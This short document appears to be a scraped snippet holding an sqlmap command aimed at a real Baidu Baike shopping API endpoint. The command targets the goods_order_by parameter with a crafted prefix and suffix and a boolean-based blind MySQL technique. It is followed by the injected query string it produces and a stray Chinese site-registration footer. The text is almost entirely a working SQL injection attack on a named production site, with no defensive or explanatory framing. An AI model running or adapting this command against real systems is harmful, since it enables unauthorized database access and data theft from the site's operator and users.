python sqlmap.py -u "http://baike.baidu.com/api/mall/getgoodslist?t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true"
-p goods_order_by
--prefix ",1=if((1=1"
--suffix "),1,(select 1 union select 2))"
--dbms=mysql
--technique=B
--string "pageSize"
--user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price,1=if((1=1 AND 5235=5235 ),1,(select 1 union select 2))&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true
浙公网安备 33010602011771号